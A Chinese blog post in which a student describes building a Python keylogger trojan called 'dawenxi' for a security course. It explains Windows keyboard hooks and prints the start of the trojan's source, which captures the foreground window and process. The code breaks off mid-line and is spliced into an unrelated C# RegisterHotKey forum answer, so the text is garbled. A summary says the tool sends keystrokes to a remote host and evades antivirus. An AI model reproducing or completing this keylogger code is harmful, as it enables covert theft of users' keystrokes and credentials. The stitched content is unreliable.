一个简单的键盘监听木马dawenxi的制作

本文介绍了作者在物联网安全课程中制作的一个简单键盘监听木马dawenxi,利用SetWindowsHookEx函数实现键盘监听,并通过Python的pyHook库,将监听到的键盘输入保存为txt文件并利用socket发送到远程主机。木马还包括了对ip地址和端口的嗅探功能。文中还提到了pyHook的安装方法、木马的封装为exe文件以及隐藏和免杀技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

事实上,我最初是没想到这学期的物联网安全课程会以答辩形式作为考核的,更没想到的是老师竟然让我们自己设计一个针对物联网的病毒或者针对物联网的漏洞,还要求不能被查杀。这难度,属实大?_? 。可是,我不想挂科啊,就只能硬着头皮来了。
我害怕答辩时会出现功能相似的作品,就没有考虑wifi安全、U盘安全、路由器安全等(果然,答辩的时候一堆这几方面的作品,现在想想,还是后怕,哈哈)。灵感来自于之前上的一门《逆向工程》,在这门课的配套书上,我看到过记录键盘的木马程序。键盘可以说是我们最常用的硬件了,所以键盘的安全问题也就相当于是物联网的安全问题啦?哈哈,就这个了。
首先,我们要知道“消息钩取”的机制。Windows的GUI以事件驱动的方式工作,键盘和鼠标的操作大都会引起事件的产生,产生事件时,操作系统会将预先定义好的消息发送给相应的应用程序,应用程序收到消息后,根据消息的内容执行相应的动作。“消息钩子”就是在事件消息从操作系统向应用程序传递的过程中,获取、查看、修改和拦截这些消息的机制。
我们所用的主要是这个函数:
HHOOK WINAPI SetWindowsHookEx(
_In_int idHook, //被安装的钩子过程的类型,像本次实验中用的WH_KEYBOARD
_In_HOOKPROC lpfn, //指向钩子过程(回调函数)的指针
_In_HINSTANCE hMod, //由lpfn指向的钩子过程所在dll的句柄
_In_DWORD dwThreadId) //钩子过程要被关联到的线程的ID(0:钩子过程关联到所有线程)
还有kernel32.dll、user32.dll、psapi.dll这三个DLL。
user32.dll提供用于执行用户界面任务的各个函数,包括键盘、鼠标操作、菜单管理等
kernel32.dll提供操作系统的核心功能服务,包括进程和线程操作、内存管理、文件访问等
psapi.dll获取进程状态
对了,还要介绍一下句柄,因为木马要用到句柄。句柄(Handle)是windows标识,由应用程序建立或使用的对象所使用的一个唯一的整数值(通常为32位)。Windows要使用各种各样的句柄来标识诸如应用程序实例、窗口、文件等对象。句柄是程序用来引用相应对象用的,一个进程被初始化时,系统要为它分配一个句柄表。
好啦,我们可以开始制作木马啦!木马的名字叫dawenxi,没错,就是“要你命三千”的发明者的名字。好的,闻西,木马主要由这几部分构成:
在这里插入图片描述
书上的键盘记录木马是用c语言写的,但是我用的是python语言。提前说明,这个木马是无害的哈!
木马的工作流程如下:钩子函数监听键盘事件—>将监听到的内容生成txt文件存储到本地—>通过套接字发送到其他主机
直接给出木马的程序:

from ctypes import *
import pythoncom  # 提供使用windows com组件的能力
import pyHook
import win32clipboard  # 调用windows剪切板
import socket
if not True:
    import codecs

'''
/**
 *author: guoguo
 *date: 2020/12/21
 *describtion: wobushidawenxia
 */
'''
# 调用核心API,存在于kernel32.dll、user32.dll、gdi32.dll这三个DLL中
user32 = windll.user32  # user32.dll提供用于执行用户界面任务的各个函数,包括键盘、鼠标操作、菜单管理等
kernel32 = windll.kernel32  # kernel32.dll提供操作系统的核心功能服务,包括进程和线程操作、内存管理、文件访问等
psapi = windll.psapi  # psapi.dll获取进程状态
current_window = None  # 将当前窗口值取零

class Trojan_guoguo:

    def get_current_process(self):
        # 获取最上层的窗口句柄
        hwnd = user32.GetForegroundWindow()
        # 获取进程ID
        pid = c_ulong(0)
        user32.GetWindowThreadProcessId(hwnd, byref(pid))
        # 将进程ID存入变量中
        process_id = "%d" % pid.value   
        # 申请内存,用以存放进程
        executable = create_string_buffer("\x00"*512)
        h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
        psapi.GetModuleBaseNameA(h_process, None, byref
C#如何在后台捕捉按键 [此问题的推荐答案] API别忘了 using System.Runtime.InteropServices; [DllImport("user32.dll")] public static extern UInt32 RegisterHotKey(IntPtr hWnd, UInt32 id, UInt32 fsModifiers, UInt32 vk); //API public Form1() { InitializeComponent(); RegisterHotKey(this.Handle, 247696411, 0, (UInt32)Keys.F10); //注册热键 } //重写消息循环 protected override void WndProc(ref Message m) { const int WM_HOTKEY = 0x0312; // m.WParam.ToInt32() 要和 注册热键时的第2个参数一样 if (m.Msg == WM_HOTKEY && m.WParam.ToInt32() == 247696411) //判断热键 { //写上你的代码 } base.WndProc(ref m); } 写上代码后 只要 在程序运行时按F10就可以触发热键更改按键可以在 注册时改 RegisterHotKey(this.Handle, 247696411, 0, (UInt32)Keys.***); http://baike.baidu.com/view/1080084.html?tp=0_10 这里有RegisterHotKey 的介绍 RegisterHotKey 函数功能:该函数定义一个系统范围的热键。 函数原型:BOOL RegisterHotKey(HWND hWnd,intid,UINT fsModifiers,UINT vk); 参数: hWnd:接收热键产生WM_HOTKEY消息的窗口句柄。若该参数NULL,传递给调用线程的WM_HOTKEY消息必须在消息循环中中进行处理。 id:定义热键的标识符。调用线程中的其他热键不能使用同样的标识符。应用功能程序必须定义一个0X0000-0xBFFF范围的值。一个共享的动态链接库(DLL)必须定义一个0xC000-0xFFFF范围的值伯GlobalAddAtom函数返回该范围)。为了避免与其他动态链接库定义的热键冲突,一个DLL必须使用GlobalAddAtom函数获得热键的标识符。 fsModifoers:定义为了产生WM_HOTKEY消息而必须与由nVirtKey参数定义的键一起按下的键。该参数可以是如下值的组合: MOD_ALT:按下的可以是任一Alt键。MOD_CONTROL:按下的可以是任一Ctrl键。 MOD_SHIFT:按下的可以是任一Shift键。 MOD_WIN:按下的可以是任一Windows按键。这些键可以用Microsoft Windows日志记录下来。 vk:定义热键的虚拟键码。 返回值:若函数调用成功,返回一个非O值。若函数调用失败,则返回值为0。若要获得更多的错误信息,可以调用GetLastError函数。 本贴来自ZDNetChina中文社区 http://bbs.zdnet.com.cn ,本贴地址:http://bbs.zdnet.com.cn/viewthread.php?tid=93775 RegisterHotKey   函数功能:该函数定义一个系统范围的热键。   函数原型:BOOL RegisterHotKey(HWND hWnd,intid,UINT fsModifiers,UINT vk);   参数:   hWnd:接收热键产生WM_HOTKEY消息的窗口句柄。若该参数NULL,传递给调用线程的WM_HOTKEY消息必须在消息循环中中进行处理。   id:定义热键的标识符。调用线程中的其他热键不能使用同样的标识符。应用功能程序必须定义一个0X0000-0xBFFF范围的值。一个共享的动态链接库(DLL)必须定义一个0xC000-0xFFFF范围的值伯GlobalAddAtom函数返回该范围)。为了避免与其他动态链接库定义的热键冲突,一个DLL必须使用GlobalAddAtom函数获得热键的标识符。   fsModifoers:定义为了产生WM_HOTKEY消息而必须与由nVirtKey参数定义的键一起按下的键。该参数可以是如下值的组合:   MOD_ALT:按下的可以是任一Alt键。MOD_CONTROL:按下的可以是任一Ctrl键。   MOD_SHIFT:按下的可以是任一Shift键。   MOD_WIN:按下的可以是任一Windows按键。这些键可以用Microsoft Windows日志记录下来。   vk:定义热键的虚拟键码。   返回值:若函数调用成功,返回一个非O值。若函数调用失败,则返回值为0。若要获得更多的错误信息,可以调用GetLastError函数。   备注:当某键被接下时,系统在所有的热键中寻找匹配者。一旦找到一个匹配的热键,系统将把WM_HOTKEY消息传递给登记了该热键的线程的消息队列。该消息被传送到队列头部,因此它将在下一轮消息循环中被移去。该函数不能将热键同其他线程创建的窗口关联起来。   若为一热键定义的击键己被其他热键所定义,则RegisterHotKey函数调用失败。   若hWnd参数标识的窗口已用与id参数定义的相同的标识符登记了一个热键,则参数fsModifiers和vk的新值将替代这些参数先前定义的值。   Windows CE:Windows CE 2.0以上版本对于参数fsModifiers支持一个附加的标志位。叫做MOD_KEYUP。   若设置MOD_KEYUP位,则当发生键被按下或被弹起的事件时,窗口将发送WM_HOTKEY消息。   RegisterHotKey可以被用来在线程之间登记热键。   速查:Windows NT:3.1及以上版本;Windows:95及以上版本;Windows CE:不支持;头文件:winuser.h;库文件:user32.lib
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值